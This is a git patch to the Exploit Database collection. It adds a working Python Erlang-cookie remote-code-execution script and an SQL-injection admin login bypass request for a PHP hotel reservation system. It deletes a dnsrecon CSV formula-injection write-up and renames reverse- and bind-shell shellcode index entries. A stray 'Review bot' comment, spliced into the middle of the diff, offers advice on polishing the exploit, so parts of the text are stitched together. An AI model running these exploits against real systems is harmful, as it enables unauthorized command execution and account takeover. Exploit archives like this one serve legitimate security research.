From f8d41df29fd87ec1dd7965edca73f90edd1b6aea Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 14 Jan 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-01-14
4 changes to exploits/shellcodes
dnsrecon 0.10.0 - CSV Injection
Erlang Cookie - Remote Code Execution
Online Hotel Reservation System 1.0 - Admin Authentication Bypass
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)
Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)
Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)
Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)
---
 exploits/multiple/remote/49418.py | 67 +++++++++++++++++++++++++++++++
 exploits/php/webapps/49420.txt | 16 ++++++++
 exploits/python/local/49394.txt | 37 -----------------
 files_exploits.csv | 3 +-
 files_shellcodes.csv | 6 +-
 5 files changed, 88 insertions(+), 41 deletions(-)
 create mode 100755 exploits/multiple/remote/49418.py
 create mode 100644 exploits/php/webapps/49420.txt
 delete mode 100644 exploits/python/local/49394.txt
diff --git a/exploits/multiple/remote/49418.py b/exploits/multiple/remote/49418.py
new file mode 100755
index 000000000..fda202054
--- /dev/null
+++ b/exploits/multiple/remote/49418.py
@@ -0,0 +1,67 @@
+# Exploit Title: Erlang Cookie - Remote Code Execution
+# Date: 2020-05-04
+# Exploit Author: 1F98D
+# Original Author: Milton Valencia (wetw0rk)
+# Software Link: https://www.erlang.org/
+# Version: N/A
+# Tested on: Debian 9.11 (x64)
+# References:
+# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+#
+# Erlang allows distributed Erlang instances to connect and remotely execute commands.
+# Nodes are permitted to connect to eachother if they share an authentication cookie,
+# this cookie is commonly called ".erlang.cookie"
+#
+#!/usr/local/bin/python3
+​
+import socket
+from hashlib import md5
+import struct
+import sys
+​
+TARGET = "192.168.1.1"
+PORT = 25672
+COOKIE = "XXXXXXXXXXXXXXXXXXXX"
+CMD = "whoami"
+​
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TARGET, PORT))
+​
+name_msg = b"\x00"
+name_msg += b"\x15"
+name_msg += b"n"
+name_msg += b"\x00\x07"
+name_msg += b"\x00\x03\x49\x9c"
+name_msg += b"AAAAAA@AAAAAAA"
+​
+s.send(name_msg)
+s.recv(5) # Receive "ok" message
+challenge = s.recv(1024) # Receive "challenge" message
+challenge = struct.unpack(">I", challenge[9:13])[0]
+​
+print("Extracted challenge: {}".format(challenge))
+​
+challenge_reply = b"\x00\x15"
+challenge_reply += b"r"
+challenge_reply += b"\x01\x02\x03\x04"
+challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
+​
+s.send(challenge_reply)
+challenge_res = s.recv(1024)
+if len(challenge_res) == 0:
+ print("Authentication failed, exiting")
+ sys.exit(1)
+​
+print("Authentication successful")
+​
+ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
+msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
+msg += struct.pack(">H", len(CMD))
+msg += bytes(CMD, 'ascii')
+msg += b'jw\x04user'
+​
+payload = b'\x70' + ctrl + msg
+payload = struct.pack('!I', len(payload)) + payload
+print("Sending cmd: '{}'".format(CMD))
+s.send(payload)
+print(s.recv(1024))
\ No newline at end of file
diff --git a/exploits/php/webapps/49420.txt b/exploits/php/webapps/49420.txt
new file mode 100644
index 000000000..f9ee4c93b
--- /dev/null
+++ b/exploits/php/webapps/49420.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass
+# Exploit Author: Richard Jones
+# Date: 2021-01-13
+# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+#Exploit URL: http://TARGET/marimar/admin/index.php
+ Host: TARGET
+ POST /marimar/admin/login.php HTTP/1.1
+ Content-Length: 57
+ Connection: close
+ Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616
+
+ email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
\ No newline at end of file
diff --git a/exploits/python/local/49394.txt b/exploits/python/local/49394.txt
deleted file mode 100644
index 668c5999c..000000000
--- a/exploits/python/local/49394.txt
+++ /dev/null
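Review bot: The `#!/usr/local/bin/python3` line sits after the fourteen header comment lines, where an interpreter line has no effect; move it to line 1 or drop it, since the file is run via python3 explicitly anyway. The header should also state the precondition the code itself enforces: the reply built at `challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()` is only accepted when COOKIE matches the node's cookie, and the `len(challenge_res) == 0` branch exits otherwise, so this is a known- or guessable-cookie issue rather than an unauthenticated one — e.g. `# Precondition: COOKIE must equal the target node's .erlang.cookie; the challenge/response below fails otherwise`. Finally, the socket created at `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)` is never closed on either the normal path or the `sys.exit(1)` path; wrapping the body in `with socket.create_connection((TARGET, PORT)) as s:` would release it in both cases.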
@@ -1,37 +0,0 @@
-# Exploit Title: dnsrecon 0.10.0 - CSV Injection
-# Author: Dolev Farhi
-# Date: 2021-01-07
-# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
-# Version : 0.10.0
-# Tested on: ParrotOS 4.10
-
-dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
-A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:
-
-_spf.example.com "test',=1+1337,'z"
-
-
-user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
-[*] Performing General Enumeration of Domain: _spf.example.com
-[-] DNSSEC is not configured for _spf.example.com
-[*] SOA ns-59.awsdns-07.com 205.1.1.1
-[-] Could not Resolve NS Records for _spf.example.com
-[-] Could not Resolve MX Records for _spf.example.com
-[*] TXT _spf.example.com test',=1+1337,'z
-[*] Enumerating SRV Records
-[+] 0 Records Found
-[*] Saving records to CSV file: ./file.csv
-{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
-{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}
-
-
-This output will then be rewritten into a CSV with this structure:
-
-Type,Name,Address,Target,Port,String
-SOA,ns-59.awsdns-07.com,205.1.1.1
-TXT,_spf.example.com,,,,'test',=1+1337,'z'
-
-The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:
-
-Attribute Values - All printable ASCII characters are permitted in the attribute value.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2a040b565..614cf7ef4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11243,7 +11243,6 @@ id,file,description,date,author,type,platform,port
 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
-49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
@@ -18355,6 +18354,7 @@ id,file,description,date,author,type,platform,port
 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
 49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
+49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43619,3 +43619,4 @@ id,file,description,date,author,type,platform,port
 49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,
 49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php,
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,
+49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b7887098d..2e25c10fe 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1005,10 +1005,10 @@ id,file,description,date,author,type,platform
 47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86
 47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
 47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
-47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
+47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
 47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86
 47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86
-47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
+47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
 47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86
 47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86
 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
@@ -1025,4 +1025,4 @@ id,file,description,date,author,type,platform
 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
-49416,shellcodes/linux/49416.txt,"Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
+49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux